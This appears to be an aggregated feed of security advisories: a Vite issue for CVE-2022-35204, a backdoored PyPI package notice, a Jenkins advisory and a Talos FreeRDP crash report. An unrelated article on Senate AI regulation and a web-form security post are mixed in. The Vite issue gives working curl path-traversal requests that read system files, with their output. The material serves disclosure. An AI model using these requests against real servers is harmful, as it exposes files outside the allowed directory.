Vitejs Vite before v2.9.13 was discovered to allow attackers to perform a directory traversal via a crafted URL to the victim's service.

**Describe the bug**

The vulnerability found at #2820 was found to be not fixed properly, which leads to the unrestricted directory traversal.

Currently the @fs directory does check for the allowed path, but it does not check for encoded paths.

For example, assuming that /@fs/home/test/ is the only allowed path, this can be bypassed by accessing /@fs/home/test/%2e%2e%2f%2e%2e%2f, which translates to /@fs/home/test/../../ internally.

Since this way of access through the browser may output an inconsistent result, curl --path-as-is can be used as an alternative way to reproduce such issue.

**Reproduction**

Any vite project is affected by this vulnerability.

npm init @vitejs/app app
cd app
npm install
npm run dev

**Reproduction in Windows**

Accessing C:/Windows/System32/drivers/etc/hosts is blocked since the allow list only contains C:/Users/stypr/Desktop/development/q/vite-project.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Windows/System32/drivers/etc/hosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Windows/System32/drivers/etc/hosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Access-Control-Allow-Origin: \*
< Date: Wed, 08 Jun 2022 04:00:32 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< Transfer-Encoding: chunked
<

    <body\>
      <h1>403 Restricted</h1>
      <p\>The request url "C:/Windows/System32/drivers/etc/hosts" is outside of Vite serving allow list.<br/><br/\>\- C:/Users/stypr/Desktop/development/q/vite-project<br/><br/\>Refer to docs https://vitejs.dev/config/#server-fs-allow for configurations and more details.</p>
      <style\>
        body {
          padding: 1em 2em;
        }
      </style\>
    </body\>
  \* Connection #0 to host localhost left intact
  \* 

What if we access like C:/Users/stypr/Desktop/development/q/vite-project/../../../../../../Windows/System32/drivers/etc/hosts? In typical cases, this doesn't work

However, if we replace the path ../ as %2e%2e%2f and replace every trailing slashes to %2f, the check is bypassed and the path traversal becomes successful.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: \*
< Content-Length: 824
< Content-Type:
< Last-Modified: Tue, 31 May 2022 03:15:34 GMT
< ETag: W/"824-1653966934106"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 03:53:26 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
<
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
\*a Connection #0 to host localhost left intact

**Reproduction in Linux**

Linux is also pretty much the same, you can first get the whitelist path (/srv/q/app) by accessing a random path(/@fs/...), and then do a path traversal based on the given whitelist.

curl -v --path-as-is "http://192.168.125.129:3000/@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts"
\*   Trying 192.168.125.129:3000...
\* TCP\_NODELAY set
\* Connected to 192.168.125.129 (192.168.125.129) port 3000 (#0)
\> GET /@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1
\> Host: 192.168.125.129:3000
\> User-Agent: curl/7.68.0
\> Accept: \*/\*
\> 
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: \*
< Content-Length: 221
< Content-Type: 
< Last-Modified: Tue, 30 Jun 2020 09:41:51 GMT
< ETag: W/"221-1593510111311"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 04:09:49 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
127.0.0.1	localhost
127.0.1.1	ubuntu

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
\* Connection #0 to host 192.168.125.129 left intact

**System Info**

Windows

  System:
    OS: Windows 10 10.0.19044
    CPU: (16) x64 AMD Ryzen 7 3800X 8-Core Processor
    Memory: 33.13 GB / 63.93 GB
  Binaries:
    Node: 16.13.2 - C:\\Program Files\\nodejs\\node.EXE
    Yarn: 1.22.10 - ~\\AppData\\Roaming\\npm\\yarn.CMD
    npm: 8.1.2 - C:\\Program Files\\nodejs\\npm.CMD
  Browsers:
    Edge: Spartan (44.19041.1266.0), Chromium (102.0.1245.33)    
    Internet Explorer: 11.0.19041.1566
  npmPackages:
    @vitejs/plugin-vue: ^2.3.3 =\> 2.3.3
    vite: ^2.9.9 =\> 2.9.10

Linux

      System:
        OS: Linux 5.13 Ubuntu 20.04.3 LTS (Focal Fossa)
        CPU: (6) x64 AMD Ryzen 7 3800X 8-Core Processor
        Memory: 12.21 GB / 15.59 GB
        Container: Yes
        Shell: 5.0.17 - /bin/bash
      Binaries:
        Node: 14.18.3 - /usr/bin/node
        Yarn: 1.22.10 - /usr/bin/yarn
        npm: 6.14.15 - /usr/bin/npm
      Browsers:
        Chrome: 97.0.4692.99
        Firefox: 100.0.2
    

**Used Package Manager**

npm

**Validations**

*   Follow our Code of Conduct
*   Read the Contributing Guidelines.
*   Read the docs.
*   Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
*   Make sure this is a Vite issue and not a framework-specific issue. For example, if it's a Vue SFC related bug, it should likely be reported to https://github.com/vuejs/core instead.
*   Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
*   The provided reproduction is a minimal reproducible example of the bug.

CVE-2022-35204: Unrestricted directory traversal with `@fs` (Bypass) · Issue #8498 · vitejs/vite

The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0.

Democritus functions\[1\] for working with files and directories.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

Once imported, you can use any of the functions listed below.

*   def is\_file(path: str) \-> bool:
        """Determine if the given path is a file."""
    
*   def file\_read(file\_path: str) \-> str:
        """Read the file at the given file\_path as a string."""
    
*   def file\_read\_bytes(file\_path: str) \-> bytes:
        """Read the file at the given file\_path as bytes."""
    
*   def file\_write(file\_path: str, file\_contents: Any) \-> bool:
        """Write the given content to the file at the given path (including a file name)."""
    
*   def file\_append(file\_path: str, file\_contents: Any) \-> bool:
        """Append the given content to the file at the given path (including a file name)."""
    
*   def file\_move(starting\_path: str, destination\_path: str):
        """Move the file from the starting path to the destination path."""
    
*   def file\_copy(starting\_path: str, destination\_path: str, \*, preserve\_metadata: bool \= False):
        """Copy the file from the starting\_path to the destination path."""
    
*   def file\_delete(file\_path: str):
        """Delete the given file."""
    
*   def file\_owner\_name(file\_path: str) \-> str:
        """Find the owner of the file at the given path."""
    
*   def file\_change\_owner(file\_path: str):
        """Change the ownership of the given file."""
    
*   def file\_ssdeep(file\_path: str) \-> str:
        """Find the ssdeep fuzzy hash of the file."""
    
*   def file\_md5(file\_path: str) \-> str:
        """Find the md5 hash of the given file."""
    
*   def file\_sha1(file\_path: str) \-> str:
        """Find the sha1 hash of the given file."""
    
*   def file\_sha256(file\_path: str) \-> str:
        """Find the sha256 hash of the given file."""
    
*   def file\_sha512(file\_path: str) \-> str:
        """Find the sha512 hash of the given file."""
    
*   def file\_name\_escape(file\_name\_arg: str) \-> str:
        """Escape the name of a file so that it can be used as a file name in a file path."""
    
*   def file\_name(file\_path: str) \-> str:
        """Find the file name from the given file path."""
    
*   def file\_name\_windows(windows\_file\_path: str) \-> str:
        """Find the file name from the given windows\_file\_path."""
    
*   def file\_name\_unix(unix\_file\_path: str) \-> str:
        """Find the file name from the given unix\_file\_path."""
    
*   def file\_size(file\_path: str) \-> int:
        """Find the file size."""
    
*   def file\_directory(file\_path: str) \-> str:
        """Return the directory in which the given file resides."""
    
*   def file\_details(file\_path: str) \-> Dict\[str, Union\[str, int\]\]:
        """Get file hashes and file size for the given file."""
    
*   def file\_exists(file\_path: str) \-> bool:
        """Check if the file exists."""
    
*   def file\_is\_readable(file\_path: str) \-> bool:
        """Check if the file is readable."""
    
*   def file\_is\_writable(file\_path: str) \-> bool:
        """Check if the file is writable."""
    
*   def file\_is\_executable(file\_path: str) \-> bool:
        """Check if the file is executable."""
    
*   def file\_contains(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> bool:
        """Return whether or not the file contains the given pattern."""
    
*   def file\_search(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> List\[str\]:
        """Search for the given pattern in the file."""
    
*   def file\_name\_matches(file\_path: str, pattern: str) \-> bool:
        """Return whether or not the file name contains the given pattern."""
    
*   def is\_directory(path: str) \-> bool:
        """Determine if the given path is a directory."""
    
*   def directory\_exists(directory\_path: str) \-> bool:
        """Check if the directory exists."""
    
*   def directory\_file\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List files at the given directory\_path."""
    
*   def directory\_file\_paths(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the file paths at the given directory\_path."""
    
*   def directory\_copy(src\_path: str, dst\_path: str):
        """Copy the directory from the src\_path to the destination path."""
    
*   def directory\_delete(directory\_path: str):
        """Delete the given directory."""
    
*   def directory\_create(directory\_path: str, mode\=0o777):
        """Create a directory."""
    
*   def directory\_disk\_usage(directory\_path: str):
        """Return the disk usage for the given directory."""
    
*   def directory\_disk\_free\_space(directory\_path: str):
        """Return the free space in the given directory."""
    
*   def directory\_disk\_used\_space(directory\_path: str):
        """Return the used space in the given directory."""
    
*   def directory\_disk\_total\_space(directory\_path: str):
        """Return the total space in the given directory."""
    
*   def home\_directory() \-> str:
        """Return the home directory."""
    
*   def home\_directory\_join(path: str) \-> str:
        """Join the given path with the home directory."""
    
*   def directory\_move(src\_path: str, dst\_path: str):
        """Move the directory from the src\_path to the dst\_path."""
    
*   def directory\_files\_details(directory\_path: str, \*, recursive: bool \= False) \-> Dict\[str, Dict\[str, Union\[str, int\]\]\]:
        """Return the file details for each file in the directory at the given path."""
    
*   def directory\_files\_read(directory\_path: str, \*, recursive: bool \= False) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all files in the directory\_path."""
    
*   def directory\_subdirectory\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the names of all subdirectories in the given directory."""
    
*   def directory\_files\_containing(
        directory\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False, recursive: bool \= False
    ) \-> Dict\[str, List\[str\]\]:
        """Search for the given pattern in all files in the given directory\_path."""
    
*   def directory\_file\_paths\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the paths of all of the files in the given directory which match the pattern."""
    
*   def directory\_file\_names\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the names of all of the files in the given directory which match the pattern."""
    
*   def directory\_read\_files\_with\_path\_matching(
        directory\_path: str, pattern: str, \*, recursive: bool \= False
    ) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all of the files in the given directory whose paths match the given pattern."""
    
*   def atomic\_write(fpath, \*, overwrite: bool \= True, \*\*cls\_kwargs):
        """Create a context manager to write atomically using the AtomicWriterPerms class to update file permissions."""
    

👋  If you want to get involved in this project, we have some short, helpful guides below:

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

CVE-2022-42041: d8s-file-system

With a poor track record on tech regulation, do lawmakers stand a chance?

While negotiations started with Young and Schumer, they didn’t end there. Rather, the pair heard input from other congressional committees and worked that into the final package.

“That was the most utilization I’ve seen of the committee process since I’ve been in Congress, and I think this has an opportunity to be even more inclusive,” Young says. “Senator Schumer and I started off with legislation, but then we drew extensively from different committees of jurisdiction. I think that this effort will be even more decentralized.”

While many senators will introduce their own AI measures, Young says the bipartisan effort is aimed at getting lawmakers on the same page.

“So some of us may have bills, but the real point of emphasis here will be on crowding in ideas from others, so I think this will be more committee-focused,” Young says.

Schumer’s Democratic partner in the AI talks is Heinrich, the New Mexico Democrat, who says the closed-door meetings in the Senate are meant to help strengthen the Senate’s long-standing committees.

“I think where we are right now is encouraging everyone through the normal processes,” Heinrich says. “Different committees are going to have very different jurisdictions.”

And there are a lot of committees and many AI-related issues to tackle. For example, the Judiciary Committee will need to sort out copyright questions, the Armed Services Committee will handle questions of war, peace, and nuclear Armageddon (concerns Senator Ed Markey, a Massachusetts Democrat, has raised). And the Education Committee will handle AI’s potential impact on public education.

Lawmakers—and their staffs—also have to pore over today’s laws to see which work and which need a reboot, like copyright law in the AI era. “Some of that, the existing law is adequate, and in other places, it’s not,” Heinrich says.

Counting Critics

For now, the AI talks have largely remained above the partisan fray. Last week, a bipartisan and bicameral group unveiled a new proposal to erect a national AI commission—comprising 10 Democrats and 10 Republicans—to address AI in a more dispassionate manner than we’ve come to expect from Congress. Even so, pro-industry critics are starting to voice their concerns over what they see as a rush to regulate.

“Putting the federal government in charge of the granular development of AI is a strategy certain to ensure that China beats us in every respect in the development of AI—and that would be catastrophic,” says Senator Ted Cruz.

Cruz is the top Republican on the Senate’s Commerce, Science & Transportation Committee, which has sweeping jurisdiction over the economy. The junior senator from Texas fears Congress is going to overstep and crush innovation in the name of digital protectionism.

“I think that’s foolhardy. Very few members of Congress have any idea what AI is, much less how to regulate it. There are—no doubt, there are risks and risks we need to take seriously, but there are also enormous potential productivity gains. And the last thing we want to do is turn technology innovation into the Department of Motor Vehicles,” Cruz says.

Like his 99 colleagues, Cruz will get his say in due time. While the bipartisan AI working group isn’t focused on producing a massive, catch-all AI bill, its members know that such legislation could be the final outcome, following on the heels of the CHIPS and Science Act of 2022.

If that happens, it will be legislation the likes of which the Senate has never seen, in part because AI appears to be all-encompassing.

“It’s going to be big. It’s going to be big, and our hope is that all of the relevant committees do the hard work of figuring out where those things are,” Heinrich says. “Hopefully, we can get on the same page on a number of those things and then package that together.”

The US Senate Wants to Reign In AI. Good Luck With That

Jenkins Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   CAS Plugin
*   requests-plugin Plugin
*   requests-plugin Plugin
*   requests-plugin Plugin
*   Selenium HTML report Plugin

**Descriptions****Improper permission checks allow canceling queue items and aborting builds**

**SECURITY-2278 / CVE-2021-21670**

Jenkins 2.299 and earlier, LTS 2.289.1 and earlier allows users to cancel queue items and abort builds of jobs for which they have Item/Cancel permission even when they do not have Item/Read permission.

Jenkins 2.300, LTS 2.289.2 requires that users have Item/Read permission for applicable types in addition to Item/Cancel permission.

As a workaround on earlier versions of Jenkins, do not grant Item/Cancel permission to users who do not have Item/Read permission.

**Session fixation vulnerability**

**SECURITY-2371 / CVE-2021-21671**

Jenkins 2.299 and earlier, LTS 2.289.1 and earlier does not invalidate the existing session on login. This allows attackers to use social engineering techniques to gain administrator access to Jenkins.

This vulnerability was introduced in Jenkins 2.266 and LTS 2.277.1.

Jenkins 2.300, LTS 2.289.2 invalidates the existing session on login.

**XXE vulnerability in Selenium HTML report Plugin**

**SECURITY-2329 / CVE-2021-21672**

Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with the ability to control the report files parsed using this plugin to have Jenkins parse a crafted report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Selenium HTML report Plugin 1.1 disables external entity resolution for its XML parser.

**Open redirect vulnerability in CAS Plugin**

**SECURITY-2387 / CVE-2021-21673**

CAS Plugin 1.6.0 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins.

This allows attackers to perform phishing attacks by having users go to a Jenkins URL that will forward them to a different site after successful authentication.

CAS Plugin 1.6.1 only redirects to relative (Jenkins) URLs.

**Missing permission check in requests-plugin Plugin allows viewing pending requests**

**SECURITY-1995 / CVE-2021-21674**

requests-plugin Plugin 2.2.6 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to view the list of pending requests.

requests-plugin Plugin 2.2.7 requires Overall/Administer permission to view the list of pending requests.

Note

The previous sentence originally stated that Overall/Read permission was newly required. This statement was incorrect and has been fixed on 2021-07-05.

**CSRF vulnerabilities in requests-plugin Plugin**

**SECURITY-2136 (1) / CVE-2021-21675**

requests-plugin Plugin 2.2.12 and earlier does not require POST requests to request and apply changes, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to create requests and/or have administrators apply pending requests, like renaming or deleting jobs, deleting builds, etc.

requests-plugin Plugin 2.2.13 requires POST requests for the affected HTTP endpoints.

This was partially fixed in requests-plugin Plugin 2.2.8 to require POST requests for some of the affected HTTP endpoints, but the endpoint allowing administrators to apply pending requests remained unprotected until 2.2.13.

**Missing permission check in requests-plugin Plugin allows sending emails**

**SECURITY-2136 (2) / CVE-2021-21676**

requests-plugin Plugin 2.2.7 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to send test emails to an attacker-specified email address.

requests-plugin Plugin 2.2.8 requires Overall/Administer permission to send test emails.

**Severity**

*   SECURITY-1995: Medium
*   SECURITY-2136 (1): Medium
*   SECURITY-2136 (2): Medium
*   SECURITY-2278: Medium
*   SECURITY-2329: High
*   SECURITY-2371: High
*   SECURITY-2387: Medium

**Affected Versions**

*   Jenkins weekly up to and including 2.299
*   Jenkins LTS up to and including 2.289.1
*   **CAS Plugin** up to and including 1.6.0
*   **requests-plugin Plugin** up to and including 2.2.6
*   **requests-plugin Plugin** up to and including 2.2.12
*   **requests-plugin Plugin** up to and including 2.2.7
*   **Selenium HTML report Plugin** up to and including 1.0

**Fix**

*   Jenkins weekly should be updated to version 2.300
*   Jenkins LTS should be updated to version 2.289.2
*   **CAS Plugin** should be updated to version 1.6.1
*   **requests-plugin Plugin** should be updated to version 2.2.7
*   **requests-plugin Plugin** should be updated to version 2.2.13
*   **requests-plugin Plugin** should be updated to version 2.2.8
*   **Selenium HTML report Plugin** should be updated to version 1.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Angélique Jard, CloudBees, Inc.** for SECURITY-2278
*   **Justin Philip, Kevin Guerroudj, Marc Heyries** for SECURITY-2329
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-1995
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2387

CVE-2021-21672: Jenkins Security Advisory 2021-06-30

An exploitable denial of service vulnerability exists within the handling of challenge packets in FreeRDP 2.0.0-beta1+android11. A specially crafted challenge packet can cause the program termination leading to a denial of service condition. An attacker can compromise the server or use man in the middle to trigger this vulnerability.

**Summary**

An exploitable denial of service vulnerability exists within the handling of challenge packets in FreeRDP 2.0.0-beta1+android11. A specially crafted challenge packet can cause the program termination leading to a denial of service condition. An attacker can compromise the server or use man in the middle to trigger this vulnerability.

**Tested Versions**

FreeRDP 2.0.0-beta1+android11 - Windows, OSX, Linux

**Product URLs**

http://www.freerdp.com/

**CVSSv3 Score**

6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

**CWE**

CWE-252: Unchecked Return Value

**Details**

FreeRDP is a remote desktop protocol implementation available for all of the major operating systems. Many of the commercial remote desktop protocol applications actually use this library as their core. The vulnerability arises due to failure to check the return value result.

    BOOL license_read_platform_challenge_packet(rdpLicense* license, wStream* s)
    {
        BYTE MacData[16];
        UINT32 ConnectFlags = 0;
    
        if (Stream_GetRemainingLength(s) < 4)
            return FALSE;
    
    
        license->EncryptedPlatformChallenge->type = BB_ANY_BLOB;
        license_read_binary_blob(s, license->EncryptedPlatformChallenge);  [1]
        license->EncryptedPlatformChallenge->type = BB_ENCRYPTED_DATA_BLOB;
    
        if (Stream_GetRemainingLength(s) < 16)
            return FALSE;
    
        if (!license_decrypt_platform_challenge(license))  [2]
    

The license structure is populated at, \[1\],and a return value check is omitted. This newly populated license is then passed into a decryption function directly. Below is the code for license\_read\_binary\_blob, \[1\].

    BOOL license_read_binary_blob(wStream* s, LICENSE_BLOB* blob)
    {
        UINT16 wBlobType;
    
    
        Stream_Read_UINT16(s, wBlobType); /* wBlobType (2 bytes) */
        Stream_Read_UINT16(s, blob->length); /* wBlobLen (2 bytes) */
        
        if (Stream_GetRemainingLength(s) < blob->length)  [3]
            return FALSE;
            
        ...
        
        blob->type = wBlobType;
        blob->data = (BYTE*) malloc(blob->length);   [4]
    

In the read\_blob function we can see the length is read in directly from the packet and then checked against the stream length, \[3\]. This will exit the function if the check fails and return false. Recall that the previous function does not check the return value so the type blob->data,\[4\], will not be initialized. The license\_decrypt\_platform\_challenge function is shown below:

    BOOL license_decrypt_platform_challenge(rdpLicense* license)
    {
        BOOL rc;
        WINPR_RC4_CTX* rc4;
        
        ...
        
        rc = winpr_RC4_Update(rc4, license->EncryptedPlatformChallenge->length,
                   license->EncryptedPlatformChallenge->data,       [5]
                   license->PlatformChallenge->data);
    

The license object is passed in and the EncryptedPlatformChallenge is used without validation, \[5\]. Recall the EncryptedPlatformChallenge data field is not set due to incorrect length so when the RC4 function attempts to use it a null pointer access happens and a denial of service condition arises.

**Crash Information**

    Crashed thread log = 
    : Dispatch queue: com.apple.main-thread
    0   com.apple.CoreGraphics          0x00007fff9109bb34 blt_pattern_blend_XXXX32 + 608
    1   com.apple.CoreGraphics          0x00007fff91058de4 argb32_mark + 19951
    2   libRIP.A.dylib                  0x00007fff8f7e4cec RIPLayerBltShape + 1319
    3   libRIP.A.dylib                  0x00007fff8f7e2713 ripc_Render + 319
    4   libRIP.A.dylib                  0x00007fff8f7df1a2 ripc_DrawRects + 438
    5   com.apple.AppKit                0x00007fff900577cd __backing_store_DrawRects_block_invoke + 39
    6   com.apple.AppKit                0x00007fff90056a77 backing_store_delegate + 768
    7   com.apple.AppKit                0x00007fff900564fb backing_store_DrawRects + 1047
    8   com.apple.CoreGraphics          0x00007fff91050be7 CGContextFillRects + 107
    9   com.apple.CoreGraphics          0x00007fff91050b79 CGContextFillRect + 134
    10  com.apple.CoreGraphics          0x00007fff91098001 CGContextDrawImages + 3688
    11  com.apple.coreui                0x00007fff98fb858e _CUITileImageWithOperation + 365
    12  com.apple.coreui                0x00007fff98fb4e78 DrawOnePartElementFromRenditionWithOperation + 993
    13  com.apple.coreui                0x00007fff98fbdc5a -[CUIThemeFacet 
    _drawSpecificRenditionKey:rendition:inFrame:context:alpha:operation:isFocused:isFlipped:] + 594
    14  com.apple.coreui                0x00007fff98fbd91a -[CUIThemeFacet 
    _drawSpecificRenditionKey:inFrame:context:isFocused:isFlipped:] + 163
    15  com.apple.coreui                0x00007fff98fbbc32 -[CUIThemeFacet drawInFrame:isFocused:context:] + 137
    16  com.apple.coreui                0x00007fff98fd8f68 CUICoreThemeRenderer::DrawWindowFrameStandardNew(CUIDescriptor 
    const*) + 1558
    17  com.apple.coreui                0x00007fff98f5a065 CUIRenderer::Draw(CGRect, CGContext*, __CFDictionary const*, 
    __CFDictionary const**) + 2341
    18  com.apple.coreui                0x00007fff98f5c992 CUIDraw + 175
    19  com.apple.AppKit                0x00007fff8ffeed25 __44-[NSAppearance _drawInRect:context:options:]_block_invoke + 64
    20  com.apple.AppKit                0x00007fff8fe55e91 -[NSCompositeAppearance _callCoreUIWithBlock:] + 183
    21  com.apple.AppKit                0x00007fff8ffeecde -[NSAppearance _drawInRect:context:options:] + 127
    22  com.apple.AppKit                0x00007fff900c0699 -[NSThemeFrame _maskCorners:clipRect:] + 259
    23  com.apple.AppKit                0x00007fff90612b0d -[NSThemeFrame _drawTransparentTitlebarInRect:] + 173
    24  com.apple.AppKit                0x00007fff900bd6b3 -[NSThemeFrame _drawUnifiedToolbar:] + 181
    25  com.apple.AppKit                0x00007fff900bd480 -[NSThemeFrame _drawTitleBar:] + 104
    26  com.apple.AppKit                0x00007fff900bd411 -[NSThemeFrame _drawFrameInterior:clip:] + 83
    27  com.apple.AppKit                0x00007fff900bd3b1 -[NSThemeFrame drawFrame:] + 892
    28  com.apple.AppKit                0x00007fff900bcf98 -[NSFrameView drawRect:] + 1098
    29  com.apple.AppKit                0x00007fff900bcb33 -[NSThemeFrame drawRect:] + 280
    30  com.apple.AppKit                0x00007fff8fffcc86 -[NSView _drawRect:clip:] + 3550
    31  com.apple.AppKit                0x00007fff8fffacf5 -[NSView 
    _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 3136
    32  com.apple.AppKit                0x00007fff8fff9be0 -[NSThemeFrame 
    _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 334
    33  com.apple.AppKit                0x00007fff8fff7feb -[NSView _displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:] 
    + 2449
    34  com.apple.AppKit                0x00007fff8fff33f5 -[NSView displayIfNeeded] + 1950
    35  com.apple.AppKit                0x00007fff8fff2c3c -[NSWindow displayIfNeeded] + 232
    36  com.apple.AppKit                0x00007fff9067741b ___NSWindowGetDisplayCycleObserver_block_invoke6365 + 476
    37  com.apple.AppKit                0x00007fff8fff25d6 __37+[NSDisplayCycle currentDisplayCycle]_block_invoke + 941
    38  com.apple.QuartzCore            0x00007fff86da5f71 CA::Transaction::run_commit_handlers(CATransactionPhase) + 85
    39  com.apple.QuartzCore            0x00007fff86da542c CA::Context::commit_transaction(CA::Transaction*) + 160
    40  com.apple.QuartzCore            0x00007fff86da50ec CA::Transaction::commit() + 508
    41  com.apple.QuartzCore            0x00007fff86db0977 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned 
    long, void*) + 71
    42  com.apple.CoreFoundation        0x00007fff88e20067 
    __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
    43  com.apple.CoreFoundation        0x00007fff88e1ffd7 __CFRunLoopDoObservers + 391
    44  com.apple.CoreFoundation        0x00007fff88dfeef8 CFRunLoopRunSpecific + 328
    45  com.apple.HIToolbox             0x00007fff8f2b7935 RunCurrentEventLoopInMode + 235
    46  com.apple.HIToolbox             0x00007fff8f2b7677 ReceiveNextEventCommon + 184
    47  com.apple.HIToolbox             0x00007fff8f2b75af _BlockUntilNextEventMatchingListInModeWithFilter + 71
    48  com.apple.AppKit                0x00007fff8fe9adf6 _DPSNextEvent + 1067
    49  com.apple.AppKit                0x00007fff8fe9a226 -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 
    454
    50  com.apple.AppKit                0x00007fff8fe8ed80 -[NSApplication run] + 682
    51  com.apple.AppKit                0x00007fff8fe58368 NSApplicationMain + 1176
    52  libdyld.dylib                   0x00007fff86cf45ad start + 1
    
    log name is: ./crashlogs/1.crashlog.txt
    ---
    exception=EXC_CRASH:signal=11:is_exploitable= no:instruction_disassembly=.byte 0xc4 #bad   
    opcode:instruction_address=0x00007fff9109bb34:access_type=:access_address=0x0000000000000000:
    

**Exploit Proof-of-Concept**

Run included Python server and connect FreeRDP Client to it.

**Timeline**

2017-05-24 - Vendor Disclosure  
2017-07-24 - Public Release

Discovered by Tyler Bohan of Cisco Talos.

CVE-2017-2839: TALOS-2017-0341 || Cisco Talos Intelligence Group

By Owais Sultan
Knowing if your forms are secure is a tricky one. Do you know if your front door is…
This is a post from HackRead.com Read the original post: Do You Know If Your Web Forms Are Secure?

Knowing if your forms are secure is a tricky one. Do you know if your front door is secure? If you locked it, if you added chains, if you added an alarm system, then it is pretty secure. If you left it unlocked and ajar, then it probably isn’t that safe.

You can make your web forms more secure, or you can leave them wide open. The problems arise when you leave them wide open without really knowing you have left them vulnerable. Here are a few things to consider if you are looking for more secure web forms.

**Have a Security Tester Try to Break Them**

Ideally, a hacker wants to **harvest information** from your forms. They are not looking to break your form, they are looking for ways to draw information from your forms. This is actually far trickier than simply breaking your forms or taking control of them. You could hire a security tester to try to break your forms and/or to try and harvest information from them.

**Have You Added Security?**

There are things you can do to make your forms more secure, just like how you can make your front door more secure. A common method is to have the form **encrypt** the information before sending it.

If your receiving program has the decryption key, then you can see the information, but a hacker has to both steal the information and then decrypt it (which is time-consuming and expensive). Here are a few common security features:

*   **CAPTCHA/reCAPTCHA**

This is where you have people fill out the form and complete a puzzle to show they are not spamming bots. Spammers are annoying, and a focused attack can break your form.

*   **Invisible reCAPTCHA** 

There are several ways these may catch spam bots. The most common is where they have hidden tick boxes that robots will tick, but that humans can’t see and so won’t tick.

*   **256-Bit SSL**

This is a common encryption method. This method of encryption is commonly used for sending information through web browsers. Securing a website with **SSL** is often where forms’ security ends.

